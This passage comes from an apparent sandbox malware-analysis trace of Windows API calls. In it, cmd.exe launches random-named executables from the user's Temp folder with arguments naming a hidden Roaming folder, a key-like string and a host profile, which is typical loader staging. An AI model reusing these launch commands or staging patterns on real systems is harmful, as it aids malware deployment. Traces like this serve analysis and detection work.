lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.645] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 
[0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.647] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.647] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.647] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.647] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.647] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.647] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.699] _close (_FileHandle=4) returned 0 [0107.699] FindNextFileW (in: hFindFile=0x1e2030, lpFindFileData=0x1af0a8 | out: lpFindFileData=0x1af0a8) returned 0 [0107.700] GetLastError () returned 0x12 [0107.700] FindClose (in: hFindFile=0x1e2030 | out: hFindFile=0x1e2030) returned 1 [0107.700] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0107.703] _close (_FileHandle=3) returned 0 [0107.704] GetConsoleTitleW (in: lpConsoleTitle=0x1af544, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.704] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe\"")) returned 0xffffffff [0107.704] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0107.704] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0107.704] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0107.704] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0107.704] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0107.704] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0107.704] _wcsicmp (_String1="\"C", _String2="CHDIR") returned 
-65 [0107.704] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0107.704] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0107.705] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0107.705] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0107.705] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0107.705] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0107.705] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0107.705] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0107.705] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0107.705] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0107.705] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0107.705] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0107.705] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0107.705] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0107.705] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0107.705] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0107.705] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0107.705] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0107.705] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0107.705] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0107.705] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0107.705] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0107.705] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0107.705] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0107.705] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0107.705] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0107.705] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0107.705] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0107.705] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0107.705] _wcsicmp (_String1="\"C", 
_String2="POPD") returned -78 [0107.705] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0107.705] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0107.706] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0107.706] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0107.706] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0107.706] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0107.706] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0107.706] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0107.706] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0107.706] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0107.706] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0107.706] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0107.706] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0107.706] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0107.706] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0107.706] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0107.706] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0107.706] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0107.706] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0107.706] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0107.706] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0107.706] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0107.706] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0107.706] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0107.706] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0107.706] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0107.706] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0107.706] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0107.706] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0107.706] _wcsicmp 
(_String1="\"C", _String2="VERIFY") returned -84 [0107.706] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0107.706] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0107.706] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0107.706] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0107.706] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0107.706] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0107.706] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0107.706] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0107.706] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0107.706] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0107.706] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0107.707] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0107.707] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0107.707] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0107.707] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0107.707] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0107.707] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0107.707] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0107.707] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0107.707] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0107.707] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0107.707] SetErrorMode (uMode=0x0) returned 0x0 [0107.707] SetErrorMode (uMode=0x1) returned 0x0 [0107.707] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x1e0508, lpFilePart=0x1af064 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x1af064*="Temp") returned 0x23 [0107.707] SetErrorMode (uMode=0x0) returned 0x1 [0107.707] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 
[0107.707] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0107.710] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.710] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", fInfoLevelId=0x1, lpFindFileData=0x1aee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aee00) returned 0x1e2030 [0107.711] FindClose (in: hFindFile=0x1e2030 | out: hFindFile=0x1e2030) returned 1 [0107.711] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0107.711] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0107.711] GetConsoleTitleW (in: lpConsoleTitle=0x1af2d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.711] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af160, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af228 | out: lpAttributeList=0x1af160, lpSize=0x1af228) returned 1 [0107.711] UpdateProcThreadAttribute (in: lpAttributeList=0x1af160, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af220, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af160, lpPreviousValue=0x0) returned 1 [0107.711] GetStartupInfoW (in: lpStartupInfo=0x1af11c | out: lpStartupInfo=0x1af11c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0107.711] _wcsnicmp (_String1="COPYCMD", 
_String2="CommonP", _MaxCount=0x7) returned 3 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", 
_MaxCount=0x7) returned -16 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0107.712] lstrcmpW (lpString1="\\F8a3iwA6.exe", lpString2="\\XCOPY.EXE") returned -1 [0107.713] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af1bc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af208 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", lpProcessInformation=0x1af208*(hProcess=0x50, hThread=0x4c, dwProcessId=0xcac, dwThreadId=0xcb0)) returned 1 [0107.972] CloseHandle (hObject=0x4c) returned 1 
[0107.972] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0107.972] GetEnvironmentStringsW () returned 0x1e2d20* [0107.973] FreeEnvironmentStringsW (penv=0x1e2d20) returned 1 [0107.973] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0108.776] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af0fc | out: lpExitCode=0x1af0fc*=0x0) returned 1 [0108.776] CloseHandle (hObject=0x50) returned 1 [0108.776] _vsnwprintf (in: _Buffer=0x1af244, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af108 | out: _Buffer="00000000") returned 8 [0108.776] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0108.776] GetEnvironmentStringsW () returned 0x1e24e8* [0108.777] FreeEnvironmentStringsW (penv=0x1e24e8) returned 1 [0108.777] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0108.777] GetEnvironmentStringsW () returned 0x1e24e8* [0108.777] FreeEnvironmentStringsW (penv=0x1e24e8) returned 1 [0108.777] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af160 | out: lpAttributeList=0x1af160) [0108.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.777] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0108.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.777] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa441ac | out: lpMode=0x4aa441ac) returned 1 [0108.777] _get_osfhandle (_FileHandle=0) returned 0x3 [0108.777] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa441b0 | out: lpMode=0x4aa441b0) returned 1 [0108.777] SetConsoleInputExeNameW () returned 0x1 [0108.777] GetConsoleOutputCP () returned 0x1b5 [0108.778] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa44260 | out: lpCPInfo=0x4aa44260) returned 1 [0108.778] SetThreadUILanguage (LangId=0x0) returned 0x409 [0108.778] exit (_Code=0) Process: id = "31" image_name = "wtsk8wxh.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe" page_root = "0x7ea16900" os_pid = "0xca4" 
os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0xc70" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4737 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4738 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4739 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 4740 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "wtsk8wxh.exe" filename = 